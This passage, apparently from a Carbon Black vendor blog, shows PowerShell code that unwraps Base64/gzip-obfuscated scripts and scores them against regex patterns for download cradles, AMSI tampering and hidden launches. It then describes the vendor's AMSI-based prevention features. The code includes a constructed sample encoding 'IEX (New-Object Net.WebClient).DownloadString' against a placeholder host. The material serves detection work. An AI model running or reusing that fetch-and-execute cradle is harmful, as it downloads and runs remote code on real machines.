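            $m = [regex]::Match($current, '(?i)FromBase64String\(\s*["'']([A-Za-z0-9+/=]{8,})["'']\s*\)')
            if ($m.Success) {
                $bytes = [Convert]::FromBase64String($m.Groups[1].Value)
                $kind  = 'Base64'
                if ($bytes.Length -gt 2 -and $bytes[0] -eq 0x1f -and $bytes[1] -eq 0x8b) {   # gzip magic
                    $in  = [IO.MemoryStream]::new($bytes)
                    $gz  = [IO.Compression.GzipStream]::new($in, [IO.Compression.CompressionMode]::Decompress)
                    $out = [IO.MemoryStream]::new()
                    $gz.CopyTo($out); $gz.Dispose()
                    $bytes = $out.ToArray()
                    $kind  = 'Base64+Gzip'
                }
                $next = [Text.Encoding]::UTF8.GetString($bytes)
                $layers += [pscustomobject]@{ Layer = $kind; Script = $next }
            }
        }
        if (-not $next) { break }
        $current = $next
    }
    [pscustomobject]@{ Final = $current; Layers = $layers }
}

# Crude triage score over the unwrapped text: which well-known techniques does it contain?
function Get-ScriptIndicators {
    param([Parameter(Mandatory)][string]$Script)
    $patterns = [ordered]@{
        'Invoke-Expression of generated text' = '(?i)\b(iex|invoke-expression)\b'
        'Download cradle'                     = '(?i)(downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|net\.webclient)'
        'In-memory loading'                   = '(?i)(\[reflection\.assembly\]::load|virtualalloc|createthread)'
        'Logging or AMSI tampering'           = '(?i)(amsiutils|amsiinitfailed|amsicontext|scriptblocklogging)'
        'Hidden, non-interactive launch'      = '(?i)(-nop\b|-noprofile|-noni\b|-w(indowstyle)?\s+hidden)'
    }
    foreach ($name in $patterns.Keys) {
        if ($Script -match $patterns[$name]) { $name }
    }
}

# Complementary control: with Script Block Logging on, PowerShell 5+ writes the de-obfuscated script
# block (what actually executes, after every layer is unwrapped) to the
# Microsoft-Windows-PowerShell/Operational log as event 4104. Run elevated on Windows.
function Enable-ScriptBlockLogging {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

# --- Constructed sample, not from a real incident (203.0.113.0/24 is a documentation range) ---
$inner  = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
$sample = 'powershell.exe -nop -w hidden -enc ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))

$result = Expand-ObfuscatedPowerShell -CommandLine $sample
$result.Layers | Format-Table Layer, Script -AutoSize
'Indicators: ' + ((Get-ScriptIndicators -Script ($sample + ' ' + $result.Final)) -join '; ')
```

The sample unwraps to the download cradle in one layer and scores on three indicators (Invoke-Expression, download cradle, hidden launch). Two caveats for practitioners: this decoder only handles static encodings, so string-concatenation and format-operator tricks still need the runtime view that AMSI and event 4104 provide; and a 4104 record is only as useful as your ability to forward it, so collect the PowerShell Operational log into the SIEM alongside process-creation events.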

Preventing Script Abuse Without Decreasing Productivity 

Thanks to our Threat Analysis Unit, VMware Carbon Black built prevention rules onto our AMSI inspection capabilities, along with machine learning to translate these previously hidden scripts. Customers can now, at the click of a mouse, translate the script in the Carbon Black Cloud dashboard and see the entire decoded script within seconds, along with an assigned risk score. This new functionality brings a level of protection and visibility for these advanced attacks rarely seen in endpoint protection platforms, giving customers immediate in-console access to the script translation details during both alert triage and threat hunting.

PowerShell alerts are highlighted in the console, showing the reason why a specific script was flagged, and delivering additional context behind the prevention to speed resolution times. When customers investigate the specific details, they can now simply click a button to translate the obfuscated script.  

In addition to translating obfuscated scripts, we’ve also improved the readability of PowerShell scripts through syntax highlighting, making it easier for customers to distinguish string content from PowerShell cmdlets and function calls while searching for threats.

Working closely with our Threat Analysis Unit, we’ve also expanded prevention capabilities for script-based Windows attacks built on Microsoft AMSI integrations into our default prevention policy, making it easy for customers using our product to have an effective security posture right out of the box.

VMware Carbon Black’s Threat Analysis Unit updated the default policy to include additional granularity for frequently used off-the-shelf attacker frameworks seen regularly in script-based attacks. These updated rules offer high-fidelity prevention for script-based attacks that decrease false positives and take the strain off already resource-deficient security teams. These updated preventions are available upon download of our latest Windows sensor 3.6 coming out this week.